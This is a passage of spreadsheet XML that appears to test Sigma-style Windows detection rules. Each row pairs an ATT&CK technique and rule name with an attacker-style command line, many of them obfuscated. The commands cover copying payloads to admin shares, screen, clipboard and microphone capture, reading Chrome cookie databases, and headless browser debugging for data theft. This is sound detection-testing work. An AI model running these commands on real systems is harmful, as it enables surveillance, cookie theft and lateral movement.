      <c r="J196" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K196" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B197" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_psr_capture_screenshots</t>
        </is>
      </c>
      <c r="C197" s="43" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE</t>
        </is>
      </c>
      <c r="D197" s="43" t="inlineStr">
        <is>
          <t>2158f96f-43c2-43cb-952a-ab4580f32382</t>
        </is>
      </c>
      <c r="E197" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "psr.exe /^s^t^a^r^t /output c:	emp\T1113_desktop.zip /sc 1 /gui 0 /stopevent 12"</t>
        </is>
      </c>
      <c r="F197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G197" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I197" s="43" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE (2158f96f-43c2-43cb-952a-ab4580f32382); Screen Capture Activity Via Psr.EXE (2158f96f-43c2-43cb-952a-ab4580f32382); Screen Capture Activity Via Psr.EXE (2158f96f-43c2-43cb-952a-ab4580f32382)</t>
        </is>
      </c>
      <c r="J197" s="43" t="n"/>
      <c r="K197" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B198" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C198" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D198" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E198" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G198" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H198" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I198" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J198" s="43" t="n"/>
      <c r="K198" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B199" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C199" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D199" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E199" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G199" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H199" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J199" s="43" t="n"/>
      <c r="K199" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B200" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C200" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D200" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E200" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G200" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H200" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J200" s="43" t="n"/>
      <c r="K200" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B201" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C201" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D201" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E201" s="43" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G201" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H201" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I201" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J201" s="43" t="n"/>
      <c r="K201" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B202" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C202" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D202" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E202" s="43" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G202" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H202" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J202" s="43" t="n"/>
      <c r="K202" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="inlineStr">
        <is>
          <t>t1563.002</t>
        </is>
      </c>
      <c r="B203" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C203" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D203" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E203" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G203" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H203" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J203" s="43" t="n"/>
      <c r="K203" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B204" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C204" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D204" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E204" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "type C:\temp\payload.exe &gt; \\10.0.0.2\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="43" t="n"/>
      <c r="J204" s="43" t="n"/>
      <c r="K204" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B205" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C205" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D205" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E205" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "type C:\temp\payload.exe &gt; \\10.0.0.2\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="43" t="n"/>
      <c r="J205" s="43" t="n"/>
      <c r="K205" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B206" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C206" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D206" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E206" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="43" t="n"/>
      <c r="J206" s="43" t="n"/>
      <c r="K206" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B207" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C207" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D207" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E207" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="43" t="n"/>
      <c r="J207" s="43" t="n"/>
      <c r="K207" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B208" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enable_windows_recall</t>
        </is>
      </c>
      <c r="C208" s="43" t="inlineStr">
        <is>
          <t>Windows Recall Feature Enabled Via Reg.EXE</t>
        </is>
      </c>
      <c r="D208" s="43" t="inlineStr">
        <is>
          <t>817f252c-5143-4dae-b418-48c3e9f63728</t>
        </is>
      </c>
      <c r="E208" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32
eg.exe" add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI /v DisableAIData""Analysis /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="43" t="n"/>
      <c r="J208" s="43" t="n"/>
      <c r="K208" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B209" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C209" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D209" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E209" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {echo Get-Process | clip
&amp; 'Get-Clipboard' | iex}</t>
        </is>
      </c>
      <c r="F209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I209" s="43" t="n"/>
      <c r="J209" s="43" t="n"/>
      <c r="K209" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B210" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C210" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D210" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E210" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "powershell.exe &amp; {echo Get-Process | clip; Get-Clip^board | iex}"</t>
        </is>
      </c>
      <c r="F210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="43" t="n"/>
      <c r="J210" s="43" t="n"/>
      <c r="K210" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B211" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C211" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D211" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E211" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {echo Get-Process | clip
Invoke-Expression ('Get-' + 'Clipboard') | iex}</t>
        </is>
      </c>
      <c r="F211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H211" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I211" s="43" t="n"/>
      <c r="J211" s="43" t="n"/>
      <c r="K211" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B212" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C212" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D212" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E212" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$mic = Get-AudioDevice  -Recording
Set-AudioDevice  -ID $mic.ID
Start-Sleep -Seconds 5}</t>
        </is>
      </c>
      <c r="F212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I212" s="43" t="n"/>
      <c r="J212" s="43" t="n"/>
      <c r="K212" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B213" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C213" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D213" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E213" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "powershell.exe &amp; {$mic = Get-Audio^Device -Recording; Set-Audio^Device -ID $mic.ID; Start-Sleep -Seconds 5}"</t>
        </is>
      </c>
      <c r="F213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I213" s="43" t="n"/>
      <c r="J213" s="43" t="n"/>
      <c r="K213" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1" s="42">
      <c r="A214" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B214" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C214" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D214" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E214" s="43" t="inlineStr">
        <is>
          <t>chrome.exe "--remote-debugging-port=9222"</t>
        </is>
      </c>
      <c r="F214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H214" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I214" s="43" t="n"/>
      <c r="J214" s="43" t="n"/>
      <c r="K214" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1" s="42">
      <c r="A215" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B215" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C215" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D215" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E215" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c chrome.exe --remote-debugging^--port=9222</t>
        </is>
      </c>
      <c r="F215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H215" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I215" s="43" t="n"/>
      <c r="J215" s="43" t="n"/>
      <c r="K215" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1" s="42">
      <c r="A216" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B216" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C216" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D216" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E216" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c firefox.exe -start-debugger-server^ 6000</t>
        </is>
      </c>
      <c r="F216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H216" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I216" s="43" t="n"/>
      <c r="J216" s="43" t="n"/>
      <c r="K216" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1" s="42">
      <c r="A217" s="43" t="n"/>
      <c r="B217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C217" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D217" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E217" s="43" t="n"/>
      <c r="F217" s="43" t="n"/>
      <c r="G217" s="43" t="n"/>
      <c r="H217" s="43" t="n"/>
      <c r="I217" s="43" t="n"/>
      <c r="J217" s="43" t="n"/>
      <c r="K217" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1" s="42">
      <c r="A218" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B218" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C218" s="43" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D218" s="43" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E218" s="43" t="n"/>
      <c r="F218" s="43" t="n"/>
      <c r="G218" s="43" t="n"/>
      <c r="H218" s="43" t="n"/>
      <c r="I218" s="43" t="n"/>
      <c r="J218" s="43" t="n"/>
      <c r="K218" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1" s="42">
      <c r="A219" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B219" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C219" s="4" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D219" s="4" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E219" s="4" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:/Users/thaim/AppData/Local/Google/Chrome/User Data/Default/Network/Cookies"</t>
        </is>
      </c>
      <c r="F219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I219" s="43" t="n"/>
      <c r="J219" s="43" t="n"/>
      <c r="K219" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1" s="42">
      <c r="A220" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B220" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C220" s="4" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D220" s="4" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E220" s="4" t="inlineStr">
        <is>
          <t>"chrome.exe" --headless --user-data-dir="C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data" --remote-debugging-port 9222</t>
        </is>
      </c>
      <c r="F220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H220" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I220" s="43" t="n"/>
      <c r="J220" s="43" t="n"/>
      <c r="K220" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1" s="42">
      <c r="A221" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B221" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_debugging</t>
        </is>
      </c>
      <c r="C221" s="4" t="inlineStr">
        <is>
          <t>Potential Data Stealing Via Chromium Headless Debugging</t>
        </is>
      </c>
      <c r="D221" s="4" t="inlineStr">
        <is>
          <t>3e8207c5-fcd2-4ea6-9418-15d45b4890e4</t>
        </is>
      </c>
      <c r="E221" s="4" t="inlineStr">
        <is>
          <t>"chrome.exe" --headless --user-data-dir="C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data" --remote-debugging-port=0x1234</t>
        </is>
      </c>
      <c r="F221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I221" s="43" t="n"/>
      <c r="J221" s="43" t="n"/>
      <c r="K221" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1" s="42">
      <c r="A222" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B222" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C222" s="4" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D222" s="4" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E222" s="4" t="inlineStr">
        <is>
          <t>"C:\Program Files\Google\Chrome\Application\chrome.exe"	--remote-debugging-address=127.0.0.1 --remote-debugging-port=9222</t>
        </is>
      </c>
      <c r="F222" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G222" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H222" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I222" s="43" t="n"/>
      <c r="J222" s="43" t="n"/>
      <c r="K222" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1" s="42">
      <c r="A223" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B223" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C223" s="4" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D223" s="4" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
